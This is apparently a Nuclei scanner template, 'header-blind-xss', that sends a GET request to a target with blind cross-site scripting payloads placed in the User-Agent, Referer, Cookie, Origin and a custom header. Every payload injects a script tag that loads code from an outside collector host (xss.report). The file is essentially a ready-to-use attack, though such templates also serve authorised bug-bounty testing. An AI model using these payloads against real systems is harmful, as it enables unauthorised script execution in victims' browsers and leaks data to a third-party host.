id: header-blind-xss

info:
  name: Delivering blind xss payloads via headers
  author: coffinxp
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    redirects: true
    max-redirects: 5
    headers:
      User-Agent: "Mozilla UACanary12345\'&#8211;><script src=https://xss.report/c/coffinxp></script>"
      Gibberish: "XFFCanary12345.{{Hostname}}'&#8211;><script src=https://xss.report/c/coffinxp></script>"
      Referer: "RFcanary12345.comRF'&#8211;><script src=https://xss.report/c/coffinxp></script>"
      Cookie: "CKCanary12345=qwertyCK'&#8211;><script src=https://xss.report/c/coffinxp></script>"
      Origin: "ORCanary12345.comOR'&#8211;><script src=https://xss.report/c/coffinxp></script>"
